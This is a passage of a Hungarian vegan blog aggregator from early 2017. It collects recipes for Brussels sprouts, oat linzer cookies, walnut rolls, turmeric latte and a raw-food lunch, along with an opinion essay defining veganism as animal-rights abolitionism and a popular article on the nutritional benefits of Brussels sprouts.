félbevágott kelbimbókat és a felkarikázott répát. 3) Kikeverjük egy tálban a vizet, a fűszereket, a préselt fokhagymát és a paradicsompürét. (Készíthetjük szárított oregánóval VAGY apróra vágott, friss bazsalikommal. Teljesen két különböző ízvilágot fogunk kapni.) 4) A zöldségeket nyakon öntjük a fűszeres paradicsomos mártással. 5) Összekeverjük alaposan, majd lefedjük a tálat alufóliával és mehet is be az előmelegített, 200°C-os sütőbe. 6) Kb. 15 perc múlva keverjük meg (alulról felfelé, hogy az alulra lefolyt mártás felülre is kerüljön) majd alufóliával lefedve, visszatesszük a sütőbe. (Óvatosan emeljük le a fóliát róla, mert forró gőz fog kicsapódni. Hajoljunk félre előtte!) 7) Kb. újabb 15 perc múlva ellenőrizzük a répát, ami valószínűleg már készre puhult. Ekkor lezárjuk a sütőt, mert elkészült az ételünk. 8) Miközben a sütőben készült a kelbimbó, közben elkészíthetjük a választott köretet a szokásos módon: kifőzzük a tésztát vagy a rizst, felszeljük a salátát stb. Kelbimbó olaszos paradicsommártásban (gluténmentes, vegán)Táplálkozz, ne csak étkezz! Jó étvágyat kívánunk! :-) Megjegyzés1: Ha már előző éjszakára beleforgatjuk a zöldségeket a fűszeres paradicsomalapba és betesszük a hűtőbe (marináljuk őket) akkor még finomabb lesz másnap a végeredmény miután megpároltuk / főztük őket. Megjegyzés2: Ha valaki szereti a sok mártást, akkor dupla adag paradicsomszószt készítsen. Tetszett a recept? Lapozz bele a Mit eszik a Világ? című könyvembe, melyben 284 színes oldalon ... ...és 170 db egészséges recepten keresztül ehetjük körbe a Világot! Megnézhetjük együtt milyen alapanyagokat fogyasztanak már több ezer éve a távoli országokban,... ...hogyan őrzik meg egészségüket és maradnak fiatalok az emberek, ...miként készíthetjük el a természet kincseit az európai otthonunkban is könnyedén és ízletesen! Számtalan recept, sok-sok hasznos konyhai tipp és rengeteg természetes alapanyag, diétánkhoz igazítva! "Szonját Hollandiában ismertük meg. Már az ő inspirálása előtt elkezdtünk egészségesebben étkezni, de Zalán (a fiam) a "Mit eszik a világ,ha..." cimű könyvnek köszönhetően kedvelte meg a nem éppen hagyományos konyhát. Azóta egyre többször főzünk együtt. Vásároljátok meg a recepteskönyvet, és legyen ez az, amit naponta forgattok! Szeretettel... /LK Kriszta/ Kattints ide és nézz bele a könyvbe!
Hogyan ne értelmezd félre a veganizmust?!
2017. február 15. Vegán lettem
Min alapszik a veganizmusod? Étrendi, egészségügyi, környezetvédelmi, állatvédelmi vagy spirituális megközelítésen? – cikkemmel a veganizmus ezekhez hasonló személyre szabottságának káros következményét járom körbe. Ez a cikk alapvetően vegánoknak készült, mert minél több vegánnal beszélgetek a veganizmusról, annál inkább azt látom a mozgalom egyik rákfenéjének, hogy a magukat vegánoknak nevezők sokasága sem érti igazán mitől veganizmus a veganizmus. Zárójelben teszem csak hozzá, sokak szerint én sem vagyok eléggé vegán, de a véleményük rólam és a másokról alkotott saját véleményem az alábbi írás aspektusából teljesen lényegtelen. Remélem ez a látszólagos paradoxon a cikk végére érthetővé válik mindenki számára és letisztul, hogy ez a dolog nem rólunk és nem az egónkról szól. A veganizmus félreértelmezései és valódi gyökere A veganizmus (nem létező) fajtái A veganizmusnak azért alakulhattak ki a cikk beharangozójában felsorolt fajtái, mert sokan egyéni véleményüket belevitték a definiálásba, majd azt a köznyelvbe fektetve használatba helyezték. Tehát sokan saját személyes tapasztalatukat, motivációjukat, elvárásaikat és véleményüket veszik alapul vagy vetítik ki a definiálás során, holott a veganizmus nem vélemény és személyfüggő, hanem egy érthetően megfogalmazott és pofon egyszerű dolog. A veganizmus semmi egyébről, csak az állatokról szól. Ezt még pontosabban és érthetőbben leszűkítve az állatok élethez és szabadsághoz való jogairól. Egészen lecsupaszítva pedig, a veganizmus nem más, mint egy első blikkre szélsőségesnek tűnő abolicionista állatfelszabadítási törekvés. Minden más egyéb csak az alap törekvés hozadéka. Tehát alapvetően nincs étrendi, egészségügyi, sem környezetvédelmi veganizmus, mert a vegán mozgalom nem az egészségünk vagy környezetünk megóvásáról szól. Ugyanakkor megtévesztően szoros összefüggésben érezheted az utóbbiakkal, hisz például a növényi étrend (nem étrendi veganizmus) hozadéka lehet az egészség megőrzése, valamint a fenntarthatóság. De nem ezekről szól, tehát nem is lehetnek meghatározói a veganizmusnak. Viszont az teljesen egyértelmű, hogy mindenki egyéni szinten éli meg úgy a veganizmust, ahogy minden egyéb dolgot is az életben. Ez így is van rendjén addig a pontig, amíg tisztában vagyunk azzal, hogy személyes motivációnk és a tapasztalataink nem egenlő a veganizmussal. Hány százalékban vagy vegán? 30%-ban, 60%-ban vagy esetleg 98%-ban? Ilyen módon sem tudjuk megfogni a veganizmus valódi gyökerét. Ugyanis vagy támogatod az állathasználat bármilyen formáját vagy nem támogatod. Tehát, ha eszel húst, mézet, tojást, tejterméket vagy iszol tejet, esetleg állatkísérletes kozmetikai vagy tisztítószereket használsz otthon vagy bőr, szőrme, toll, gyapjú ruházatot vásárolsz, illetve vadállatokat használó cirkuszba vagy delfináriumba látogatsz, akkor támogatod az állathasználat valamilyen formáját és nem vagy vegán. Ide tartozik a sajtos chips és a tejsavós növényi tejszínhab vásárlása is. Tehát vagy vegán vagy vagy nem vagy vegán. Nem létezik százalékos meghatározhatóság, mivel az éppen általad támogatott állathasználatot elszenvedő állat szemszögéből, ez teljes mértékben értelmezhetetlen. Őt vagy békén hagyják vagy nem. Ugyanakkor -kérlek ne érts félre- ez itt nem egy kirekesztő elitista fejtegetés, mert meglátásom szerint ez esetben is nagyon távol lennék a valódi céltól, hiszen még mindig csak az emberi oldalát feszegetném a veganizmusnak teljesen feleslegesen. Hisz a veganizmus még mindig nem rólad és nem a rólad alkotott véleményemről szól. Ezek itt csak az alapjai az értelmezésnek, mert ha nem értjük valaminek az alapját, hogyan tudnánk annak célja felé haladni a saját utunkon?! Személy szerint minden törekvést támogatok, amely mögött a tiszta megértés és a tiszta cél áll. De amíg a cél és a megértés nem kristály tiszta, addig a törekvés sem lesz az. Az egy következő kérdés, hogy a 21. század városi embere lehet-e vegán egyáltalán? Hiszen annyira magától értetődő egyelőre az állatok tulajdonként kezelése és használata a világ minden pontján, hogy ha olyan terméket vásárolsz, amit nem te állítasz otthon elő, akkor nagyon nehezen garantálható a termék 100%-os állathasználat mentességét. Egy mondatban még egyszer a lényegről: veganizmus az, amikor semmilyen formáját nem támogatod az állathasználatnak, amelynek az eszményi végkifejlete az állatok felszabadítása, azaz az állatok tulajdonként és/vagy tárgyként kezelésének megszűnése. Ragaszkodások a személyes és eltérítő megközelítésekhez Ha valakiben kialakul valamilyen vélemény a veganizmusról az természetes. Ott kezd aggályossá válni a helyzet, amikor az adott véleményt tényszerűen kezeli annak ellenére, ha már többször összetalálkozott a mozgalmat tisztázó alapokkal. Miért probléma ez? Mert ameddig az egészségeddel, a környezetvédelemmel, a spiritualizmussal és a táplálkozással vagy elfoglalva, elveszik a lényeg és a lényegtől gyökeresen eltérő irányt vesz a kommunikációd. Az a tény veszik el a célkeresztből, hogy az állatokat tulajdonként kezeljük. Mert ahogy azt már többször leírtam, a vegán mozgalom nem rólad vagy rólam és az érzéseidről, vagy a tapasztalataidról szól, hanem azokról az állatokról, amelyeket tárgyként kezelve használnak bármire vagy küldenek a halálba. Egyik előadásomon egy hölgy nagyon ragaszkodott véleményéhez, amely az ő személyes megközelítéséből táplálkozott. Egy fehér széken ültem és ahhoz hasonlítottam a helyzetet, mint amikor valaki azt a fehér széket sárgának, vagy szürkének látja. Ez önmagában nem jelent gondot, addig a pillanatig amíg érti, hogy a szék valójában fehér. Ugyanis ha érti, hogy a szék fehér, addig egy a valódi alapot célkeresztben tartó beszélgetés alakulhat ki arról, hogy ő vajon miért láthatja a fehér széket szürkének vagy sárgának. A lényeg, hogy az alapok tiszták legyenek és tudjunk mihez viszonyítani a beszélgetésben. Amint nincs meg az az alapvető információ, hogy a szék fehér, a beszélgetés sem az alapszín félreértelmezésről szól majd, mivel az egyik oldal biztos benne, hogy nincs is félreértelmezés. A veganizmus esetében az alap fehér szín az állathasználat megszüntetésére vonatkozó törekvés, és a további színek a személyes motivációkkal összefüggő de szigorú értelemben véve nem létező fajtái a veganizmusnak. Tovább gördítve azok, akik az eddig leírtakkal nem értenek egyet, lényegében azt mondják, hogy a veganizmus önös érdekeket (az én egészségem, a mi környezetünk) szolgál és nem az állatok szabadsághoz és élethez való jogaival foglalkozik. Ez téves megállapítás, mert ezek csak a veganizmus hozadékai, de nem ezek határozzák meg, ahogy azt fentebb is írtam. Miért káros az eltérítő és személyiségfüggő megközelítés? Mert elveszi az egyetlen elemi lényegről a figyelmet. Mégpedig az állathasználatról. Végletesen leegyszerűsítve a veganizmus ott kezdődik, ahol az énség véget ér, mert a veganizmus nem rólad vagy rólam szól, hanem az állathasználat, valamint az állatok tulajdon és tárgystátuszának megszüntetéséről. Kicsit jobban körbejárva, amíg úgy hirdeted a veganizmust, mint egy egészségügyi, környezetvédelmi, táplálkozási forradalmat, addig első körben érthetetlenül és közvetve ugyan, de támogatod az állathasználatot. Mégpedig azért, mert amíg azzal foglalkozik X számú ember, hogy a növényi étkek egészségesek vagy az ipari állattartás milyen mértékben erősíti az üvegházhatást vagy megpróbálnak együttérezni a vágóhídra küldött állatok millióival, addig elveszik az a lényegi alap kérdés, miszerint jogunk van-e egyáltalán használni és tárgyként, tulajdonként kezelni (azaz megölni, megenni, megnyúzni, megfejni, kihasználni, stb.) más fájdalmat és félelmet érezni képes élőlényeket?! Ez az alapkérdés az állathasználat összes formáját lefedi, mert a gyökerénél ragadja meg a problémát, míg az egyéni személyes adalékok csak a probléma egy kis szegmensére vonatkoznak. Mindezek ellenére -és ahogy már korábban is írtam- roppant fontosnak tartok minden törekvést. Hiszem azt, hogy az emberek 20-30-40 éves beidegződéseit (aki nem eszik húst az fehérje és vashiányos lesz; a növényi étrend egészségtelen; nincs más megoldás, mint állatokon kísérletezni; versenysportolni csak hússal lehet; és sorolhatnám...) csak fokozatosan lehet megváltoztatni, személytől és a beidegződések erősségétől, valamint az alapvető nyitottság meglététől függően. Ugyanakkor, ha a törekvések mögött nincs meg a valódi cél tiszta megértése, akkor végső soron nem lesznek hatékonyak a törekvések, hiszen nem tudják a részinformációkkal átadni a valódi üzenetet, mely így szól: Ne használjuk az állatokat! A vegán gömb, mint szemléltető eszköz Előadásaimon a köznyelvben elterjedt sokféle veganizmust egy elméleti gömbként szoktam bemutatni. Ennek a gömbnek végtelen számú felületi pontja van. A gömb felületének minden pontja egy ember egyedi véleményét jelöli a veganizmusról. Mivel egy kicsit mindenkinek más a véleménye, így a gömb minden pontja egy kicsit más. Amikor az ember eldönti, hogy vegán lesz, belép a gömbbe a saját pontján. Itt csatlakozik a gömb belsejéhez, amely a vegánok véleményének és motivációjának egyvelege, valamint ezen motivációk egymásra hatásának összessége. A gömb állaga és összetétele folyamatosan változik, azonban van egy állandó biztos pontja, az pedig a középpont. Ez a középpont a veganizmus egyetlen tiszta célja, azaz az állathasználat eltörlése. Most tegyük fel, hogy te belépsz a gömbbe egy ponton saját véleménnyel és nézettel a veganizmusról. Amíg nem tudatosítod magadban, hogy a gömb egyetlen állandó pontja micsoda és nem veszed az irányt a saját tempódban a középpont felé, addig csak a többi vélemény között cikázol és pattogsz a gömbben jobbra-balra. Ugyan alakítod a gömböt és a gömb is alakít téged, de a középpont lényegének megértése nélkül ez egy végtelen, és az állatok szempontjából nézve totálisan értelmetlen, önös működés. Ugyanakkor belépő pontostól és motivációdtól függetlenül, de a középpont állandó lényegét értve a gömb belsejére olyan hosszútávú hatással lehetsz, mely az állatok szempontjából már nem közömbös. A középpont felé törekvés sebessége és iránya személyfüggő és nem is ezen jellemzők firtatásán van a hangsúly. Hiszen nevezheted magad étrendi, környezetvédelmi, spirituális, de még etikai vegánnak is, ha csupán az étrendeddel, a fákkal, az állatok lelkével vagy tévesen állatjóléti kérdésekkel foglalkozol anélkül a tiszta és érthető cél nélkül, miszerint fel kell hagynunk az állatok tulajdonként és tárgyként kezelésével. Ha vegán elveket szeretnél követni, akkor muszáj lesz elfogadnod ezt az alapvetést és bármit csinálsz, ennek szellemiségében kell tenned, mert ellenkező esetben félrevezető lesz a tevékenységed, nem a célt szolgálja majd és az állatok szemszögéből -akikért tesszük amit teszünk- szinte teljes mértékben értelmezhetetlenné válik. Bizonyos törekvésekkel kapcsolatos további problematikák Hatékonynak gondolt, de eltérítő félmegoldások Az első és legfontosabb kérdéskör, amivel sűrűn összekeverik a veganizmust azok az állatjóléti törekvések. Az állatjólét, -szabadtartás, nagyobb ketrec, stb.- mint olyan teljesen értelmezhetetlen az állatok szemszögéből, mert nem az a cél, hogy az amúgy levágásra szánt állat hetente kétszer láthassa az égboltot, hanem hogy ne fosszuk meg az élethez és szabadsághoz való jogaitól azt az állatot. Addig a pontig nincs értelme beszélni állatjogokról, amíg azok az élőlények tulajdon státuszban vannak és az ember szabadon rendelkezhet életükkel. Akárcsak a 19. század közepi USA-ban. A rabszolgaság törvényen kívülre helyezésével kezdődött meg a néger rabszolgák sorsának, általuk is értelmezhető javulása. Voltak négertartást szabályozó intézkedések, de ameddig nem történt meg az említett törvényen kívül helyezés, a rabszolgák testi épségének értéke nagyjából megegyezett az ajtófélfáéval. Mindkettő a gazda tulajdona volt és sok esetben hasonlóképpen is bántak a tulajdonukkal, hisz nagy általánosságban komoly retorziót nem vont maga után a brutalitás. Az állatokkal ugyanez a helyzet. Sok egyéb állatvédelmi, az emberek együttérzését feltételező törekvések az előbbinél sokkal árnyaltabban ugyan, de mégsem mutatkoznak hosszútávon hatékonynak. Amíg sokan más embertársaik felé sem mutatnak kellő empátiát, úgy hogyan lenne elvárható, hogy pusztán együttérzésből megsajnáljon a többség olyan élőlényeket, akik ugyancsak a többség szerint eleve azért vannak, hogy legyen mit ennünk, hogy legyen bőrcipőnk, vagy tollkabátunk?! Van mindenkinek, de főleg az emberiségnek elég baja, nehogy még az állatokkal is törődni kelljen. További anomália, hogy az együttérzést követelő megközelítés alakítja ki sok emberben a hippiskedő spirivegánok előítéletet és tereli újfent el az elemi lényegről a célkeresztet. Tehát az együttérzést kicsikarni próbáló kampányok -most már szerintem mindenki által tapintható módon- sem a legfontosabb, feljebb több ízben megfogalmazott kérdéssel foglalkoznak. Rövid távon és bizonyos embereknél lehetnek hatékonyak, de a hosszú távú célokat nagyon közvetve szolgálják. Mi lehet akkor a megoldás? Nem győzöm hangsúlyozni, hogy minden törekvés fontos, de a megfelelő irányvétellel. Az igazán hatékony, nagy tömegekre ható megoldásként csak hosszútávú, a gondolkodásmód és szemléletváltásra specializálódott, erőszakmentes kommunikációt és az élettereket átfogó, sokrétű, az alapkérdéssel foglalkozó edukációt látom. Érzésem szerint ez az egy hatékony útja lehet annak, hogy az arra nyitott idősebb korosztályokban az állat tulajdonstátusz szemlélete átalakuljon, illetve gyermekként ki sem alakuljon. Hiszen az állatok nem tárgyak, nincs jogunk annak kezelni őket!
Új kedvenc: a kelbimbó!
2017. február 12. Eszemiszom – Jóga Magazin
Mindig felfedezek valami új zöldséget a piacon, most például aktuális kedvencem a kelbimbó, mely szintén egy olcsó és itthon is frissen beszerezhető superfood! Lássuk csak, mi mindent tud ez a kis zöld golyócska!
A kelbimbó bimbós kelként is ismert – a káposztafélék családjába tartozik, rokona a karfiol és a karalábé, két szintén kevésbé kedvelt zöldségfajtánk. Kínában őshonos, Európában a 18. századtól népszerű. Jellegzetes ízét pont, amelyért nem szeretik – a sinigrin nevezetű vegyületnek köszönheti, mely rákellenes hatású.
Élettani hatása
A kelbimbó igen gazdag vitaminokban, tartalmaz A-, B-, K-, E- és C-vitamint, valamint élelmi rostokat, kalciumot, magnéziumot és vasat. Rosttartalmának köszönhetően jó hatással van a belekre, illetve segíti az emésztést. Erősíti a szervezetet, és fokozza annak ellenálló képességét. Káliumtartalma miatt kiváló vízhajtó hatással rendelkezik.
A kelbimbó csökkenti a koleszterinszintet, legjobban nyersen fogyasztva fejti ki hatását, de párolva is megőrzi ezt a tulajdonságát. Kiváló omega-3 zsírsav-forrás, melynek köszönhetően a vérnyomás csökkentésében is hasznos lehet.
Fitotápanyag-tartalmának köszönhetően rákvédő anyagokat tartalmaz, melynek következtében csökkenti a különböző daganatos megbetegedések kialakulását szervezetünkben. Jó hatással van a pajzsmirigyműködésre is.
Terhes nőknek fogyasztása kifejezetten ajánlott, hiszen magas folsav– és kalciumtartalommal rendelkezik.
Miért hasznos kelbimbót fogyasztani?
Elsősorban amiatt, mert egy adag a napi C- és K-vitamin-szükségletünket is fedezi. A kelbimbó a legegészségesebb ételek közé tartozik, már ami a vitamin- és ásványianyag-, valamint fitonutrienstartalmát illeti a kalóriatartamához viszonyítva. Ugyanis egy adag relatíve kevés kalóriát, viszont rengeteg hasznos tápanyagot tartalmaz.
Egy adag (körülbelül 88 g) nyers kelbimbó tápértéke 38 kcal; zsírt nem tartalmaz, van benne 8 g szénhidrát (amiből 3 g cukor és 2 g rost) és 3 g fehérje. Egy ilyen adag a napi K-vitamin-szükségletünknek a 196 százalékát, a napi C-vitamin-igényünknek pedig a 125 százalékát fedezi. Ezen kívül megközelítőleg a 10 százalékát tudjuk vele fedezni a napi A- és B6- vitamin-szükségletünknek, valamint a napi folsav-, kálium- és mangánigényünknek.
Miért ajánlott a sok kelbimbó fogyasztása? Természetesen mindazért, amiért általában a zöldségek és a gyümölcsök ajánlhatóak: csökkentik olyan súlyos betegségek kialakulásának a valószínűségét, mint az elhízás, a cukorbetegség és a szív-és érrendszeri megbetegedések. Az 1980-as évek óta köztudott, hogy a keresztes virágú zöldségfélék, amilyen a kelbimbó, a brokkoli és a karfiol, összefüggésbe hozhatók a rák kialakulásának csökkent valószínűségével.
Egy friss tanulmány pedig azt is kimutatta, hogy azok a kéntartalmú vegyületek (például a szulforafán), amelyeknek ezek a zöldségfélék a jellegzetes kesernyés ízüket (és büdös szagukat) köszönhetik, összefüggésben vannak a rákellenes hatásukkal. A szulforafánon kívül a kelbimbóban levő klorofill is hatékony a karcinogén anyagok ellen.
A rákellenes hatáson kívül figyelemreméltó a kelbimbó jótékony hatása a csontokra is. A kevés K-vitamin-bevitel összefüggésbe hozható a csonttörések nagyobb kockázatával. A kelbimbó pedig nagyon gazdag K-vitamin-forrás, így segíti elő a csontok egészségét. Ráadásul egy adag 37 milligrammnyi kalciumtartalmával is hozzájárul az erős csontozat kialakulásához.
A cukorbetegséggel élők számára is jótékony hatású lehet a kelbimbó, ugyanis alfa-liponsavat tartalmaz, ami a glükózszintet csökkenti, az inzulinérzékenységet pedig növeli. Ugyanakkor azt is érdemes megjegyezni, hogy a vizsgálatok az alfa-liponsav intravénás adásának jótékony hatásait bizonyították; az emésztőrendszerbe juttatott liponsavval kapcsolatban nincsenek adatok.
A kelbimbóban található C-vitamin és más antioxidáns anyagok segítenek megőrizni a szem egészségét, és a látás minőségét – akár idősebb korban is. A C- és az A-vitaminnak a bőr védelmében és egészségében is kiemelkedő szerepe van.
Mennyit fogyasszunk belőle?
Az egészséges, kiegyensúlyozott táplálkozás irányelvei szerint hetente 2-3 alkalommal fogyasszunk belőle, egészségre gyakorolt pozitív hatásait így érvényesíthetjük a legjobban. Hogyan építhetünk minél több kelbimbót étrendünkbe? Először is fontos tudni, hogy érdemesebb kisebb és a frissebb kelbimbókat választanunk, ezeknek ugyanis édesebb az ízük, és nem fordul elő, hogy fásak lennének, míg a nagyobbaknál ez megeshet. Mindig külön zacskóban tároljuk a hűtőszekrényben. Érdemes azonban inkább frissen fogyasztani: minél frissebb ugyanis a kelbimbó, annál finomabb.
Az elkészítésekor nagyon fontos még az is, hogy nem szabad túlfőzni: veszít a tápértékéből, és ekkor erősödik fel a jellegzetes kesernyés íze. A legjobb, ha nem főzzük, hanem a sütőben megsütjük – ehhez tálaljunk szőlőt, diót és balzsamecetet.
Íme néhány további tipp az elkészítéshez:
- A megsült kelbimbókat hintsük meg olívaolajjal, őrölt fekete borssal és darált fokhagymával.
- Szeleteljük vékonyra és nyersen adjuk hozzá a salátánkhoz.
- Adjunk cukrozott diót és szárított vörösáfonyát a sült kelbimbóhoz.
- Pirítsuk meg serpenyőben a felszeletelt kelbimbót.
Van-e egészségügyi kockázata annak, ha sok kelbimbót fogyasztunk?
Ha valaki vérhígítót szed, fontos, hogy hirtelen ne változtasson úgy az étrendjén, hogy a K-vitamin-bevitele nagyban csökkenjen vagy nőjön, mivel e vitaminnak fontos szerepe van a véralvadásban. Így a kelbimbó fogyasztásával óvatosnak kell lenniük azoknak, akik ilyen gyógyszereket szednek.
Forrás: hazipatika.com
Gauranga Das http://hotashtanga.com
Gluténemntes zabpelyhes minilinzer
2017. február 8. Élj harmóniában
Ez a kis minilinzer kiváló tízóraihoz, délutáni nasinak vagy reggelinek, de fogyaszthatod főétkezés után is . Sz áraz jellegű, mint általában a linzerfélék és ez a változat kevés zsi radékot is tartalmaz - így egészségesebb . Én imádom a szárazabb sütiket, kekszeket, de ha Te nem annyira szereted a szárazabb süteményeket, fogyaszthat od tejszínhabbal, még egy kis lekvárral, vanília krémmel vagy bármivel, amit szeretsz:) Hozzávalók 1 csésze apró levelű zabpehely 1 csésze aprított mandula 1 csésze rizsliszt 1/2 tk. fahéj vanília ízlés szerint 1/2 citrom reszelt héja 1/3 csésze datolyaszirup (H a édesszájú vagy akkor lehet 1/2 csésze is. Használhatsz juharszirupot is.) 3 ek kókuszolaj (használhatsz repceolajat is) 1 alma eperlekvár Vegyszermentes (bio) alapanyagokat használj! Keverd össze egy tálban a zabpelyhet, a rizslisztet és az aprított mandulát - lehet egész mandula is és akkor daráld apró darabokra. K everd hozzá a fűszereket és a citromhéjat. Egy másik tálban reszeld le az almát - én mindig meghámozom előtte - keverd össze a kókuszzsírral és a datolyasziruppal. Ezt a keveréket öntsd a másik tál tartalmához és kézzel gyűrd jól össze .Kanállal vagy a kezeddel kis golyónyi darabokat vegyél ki a tész tából és nyomkodd bele egy sütőpapírral borított tepsibe. Majd a gombóc közepébe a mutatóujjaddal csinálj egy kis mélyedést. Az eperlekvárt tedd a kis mélyedésekbe. Majd 180 fokra előmelegített sütőben, s üsd aranybarnára a süteményeket. (kb. 15-20 perc)
Diós csigák
Leila hercegnő második számú kedvence ;) A legtöbb ember a péksüteményt ma már csak egy utcai bódéban tudja elképzelni. Persze, hiszen minden második sarkon van már pékség. Egyik ilyen, másik olyan, mi meg válogatunk, fanyalgunk vagy akár ácsingózunk rajtuk. Aztán rohanvást gyűrjük le a csigákat meg pogikat az utcán, belebújunk a papírzacskóba, és közben azon morfondírozunk, hogy vajon mekkora az a falat, aminél még úgy tűnik, mintha semmi nem lenne a szánkban. :)))) És fogalmunk sincs már, hogyan kell péksütit sütni, sőt, biztosak is vagyunk benne, hogy ez valami hipernehéz, ultrabonyolult dolog. Pedig nem is! :) Próbáld ki a házi péksütiket, simogasd a tésztát, válogasd össze te az alapanyagaidat, és láss csodát: ez a péksüti bizony nem csak frissen sütve lesz jó, hanem akár másnap is, és újra felfedezed a régen elfeledett ízeket. Csinálj sokat, fagyaszd le, és minden egyes reggel, amikor előveszel egyet, áldani fogod a saját nevedet. ;) Mostantól nincs kifogás, ha a család (én! hehe..) édeset kíván: ezekből a hozzávalókból nálam tényleg mindig van otthon, és itt az én szuper diós csigám, amihez az ihletet Zöldella receptje szolgáltatta. Ezúton is köszönöm neki! :) Hozzávalók két nagy tepsi csigához: - 600 g liszt - 300 ml növényi tej - 125 g langyos kókuszolaj - 100 g nádcukor - 1 csomag vaníliás cukor - 35 g friss élesztő - 3 nagy csipet só A töltelék - 120 g langyos kókuszolaj - 200 g darált dió - 100 g porcukor - A lisztet öntsük egy nagyobb tálba, keverjük hozzá a cukrokat és a sót. Öntsük hozzá a langyos kókuszolajat és a tejben feloldott élesztőt. - Dagasszuk, dolgozzuk jól ki a tésztát, ami akkor jó, ha elválik az edénytől. Ezután kelesszük langyos szobában egy órát. Ha van kenyérsütő gépünk, eyszerűen tegyük bele a tészta alapanyagait, és kapcsoljuk be a dagasztás programot. - Közben keverjük ki a tölteléket a hozzávalókból. - Amikor megkelt a tészta, osszuk ketté, és lisztezett felületen a gombócokat egyenként nyújtsuk 2-3 mm vastag lappá. Ezeket egyenletesen kenjük meg a töltelékkel, majd tekerjük fel rúddá. - Vágjuk másfél-két centi vastag szeleteket a rúdból, és fektessük őket sütőpapírral bélelt tepsire. Hagyjunk a csigák között minimum 2 cm távolságot, hogy később legyen helyük megdagadni. - 200 fokos sütőben süssük meg szép barnára. A sütőbe tegyünk egy kis edényben vizet is, és vigyázzunk, ne száradjon ki a tészta. Miután kivettük, a még forró csigák tetejét megkenegethetjük növényi tejjel. Jó étvágyat! Elkészítési idő: 20 perc (+kelesztés, sütés) Ez egy vegán recept volt. :) Ha tetszett, hasonlókat ITT találsz. Letöltheted a két ajándék receptgyűjteményt is. Nézd meg a legújabb Kertkonyha főzőtanfolyamokat : Kezdő Vegán Magyaros Konyha Vegán Módra Növényi Tejek és Tejtermékek Görög Vegán Szendvicskrémes
Kurkumás latte (vegán)
2017. február 2. Zizi kalandjai
Jól nézzétek meg ezt a képet… egy ilyenre vágyom nagyon. Csak én és a kurkumás lattem, meleg takaróba bújás és magammal foglalkozás. Megelégednék havi egy ilyen nappali programmal (otthon úgy, hogy egyedül vagyok), de még van egy ultra cuki, vihogós, imádnivaló cicifüggőm , aki nem tud elszakadni tőlem hosszabb időre, így marad az álmodozás, hogy hamarosan lesz lehetőségem egy ilyen kikapcsolódásra is!
Kurkumás latte végigsöpört a nemzetközi “gasztroblogok piacán”… nem csodálom, mert nagyon finom. Mostanában tudatosan leszoktunk I.-vel a kávéról… direkt nem veszünk itthonra kávét, hogy ne főzzünk magunknak mindennap (persze házon kívül néha iszunk, mert megkívánjuk). Így nagyon finom teákat iszom délutánonként, amikor már vágyom egy kis “kényeztető” italra… vagy pedig csinálok egy ilyen kurkumás lattet. Krémes a sűrű mandulatejtől, éppen eléggé fűszeres a fahéjtól és a kurkumától és elég édes a juharsziruptól. Olyan aranyital, mint a mamuszom színe! Na jó, a kép úgy lenne tökéletes, ha a latte habos lenne, de erre nem volt lehetőségem a két fotós asszisztensem mellett, hogy még habosítsak is!
Ádival is ma délután anya-Ádi randit tartottunk, ő babakávét ivott (gabonakávé rizstejjel), én pedig ilyen kurkumás lattet. Belekóstolt és alig bírta abbahagyni, nagyon ízlett neki is! Szóval gyerek által tesztelt recept, ajánlom mindenkinek 2 és 102 év között!
Kurkumás latte (vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Kávé helyett, krémes, fűszeres, aranysárga, kényeztető ital. Szerző: Zizi Recept típusa: ital Konyha: vegán Adag/mennyiség: 1 főre Hozzávalók 250 ml natúr mandulatej 2 teáskanál juharszirup (agavészirup, rizsszirup is használható) 1 teáskanál kurkuma 1 teáskanál extra szűz kókuszzsír ⅛ teáskanál őrölt vanília fahéj, tálaláshoz Elkészítés Egy lábasban melegítsük fel forrásig a mandulatejet. Tegyük egy bögrébe a juharszirupot, a kurkumát és a vaníliát. Öntsük rá a meleg mandulatejet és jól keverjük el. Adjuk hozzá a kókuszzsírt és ezzel is keverjük el. Ha van habosítónk, akkor habosítsuk fel, szórjuk meg a tetejét fahéjjal (ezt ne hagyjuk ki!) és már ihatjuk is a finomságot. Jegyzetek Mandulatejjel a legfinomabb, de használhatunk más növényi tejet is hozzá. Ha nincs extra szűz kókuszzsírunk, akkor ne tegyünk bele semmit. Az extra szűz egy enyhén kókuszos ízt ad neki, amitől nagyon finom lesz, de nélküle sem veszítünk semmit az ital élvezeti értékéből. 3.5.3226
Nyers fasírt fehérrépa rizottóval, aszalt gombával, balzsamecetes salátával
2017. január 26. Gitta nyersétel blogja
Ez egy komplett ebéd. Teljes. Szemnek is, ízlelőbimbóknak is és gyomornak is. A fasírt tegnap készült, tegnap csak salátával ettem, ma 5 perc alatt készült hozzá ez a fehérrépa rizottó és a gomba. Fasírt: 1/2 darab zeller 1 szál sárgarépa 1 szál fehérrépa 5-6 darab aszalt paradicsom 2 marék napraforgómag (beáztatva, megaszalva) 1 csipet só Aprítógépbe tesszük a megtisztított, nagyra darabolt zöldségeket, az aszalt paradicsomot, és a magot és a sót. Mivel ez egy kis adag, minden összetevő elfér a gépben... emlékszem még, amikor 30 adagot készítettem, először csak a magot aprítottam meg, utána csak a zellert, stb... és minden ment a nagyon-nagy tálba, ahol a végén összekevertem. De így egyszerűbb az ízesítés is, mire a gép megtöri a zöldségeket és a magokat, a só is el tud keveredni. Agyon-ízesíteni nem kell, mert az aszalt paradicsomnak nagyon jó kis íze van, ő maga is nagyon jól fűszerez. Só, mindössze... de ha nem elégszel meg a zöldségek természetes ízével, jöhet bele bors, fokhagyma, bazsalikom, stb... Fagyis kanállal gombócokat formáztam és aszalógépben 2-3 óra alatt készre aszaltam. Rizottó: 2 szál fehérrépa és vegyesen zöldségek, amit itthon találtam, piros kaliforniai paprika, cukkini, lilahagyma nagyon pici apróra vágva (jöhetne még bele brokkoli, zöldborsó, édesburgonya, vagy bármi, ami kéznél van) A fehérrépát aprítógépbe tesszük és teljesen morzsásra aprítjuk. Állaga olyan lesz, mint a főtt rizsnek, elég apró szemű, de még nem pépes. Ilyen formában nagyon kevesen ismerik fel az étel ízét... miből is van? A színes zöldségeket apróra vágjuk, és összekeverjük a fehérrépa morzsával. Pár csepp citromlé, só, és kézzel lazán összekeverjük. Aszalt gomba gomba, só A gombát tisztítás után daraboljuk, besózzuk, megvárjuk, amíg egy kis levet ereszt. Kb 15 perc után jól kinyomkodjuk, és mehet az aszalógépbe, és 45 fokon aszaljuk kb fél órát. Ez alatt az idő alatt felmelegszik, megpuhul. A saláta pedig mindenféle zöld és koktél 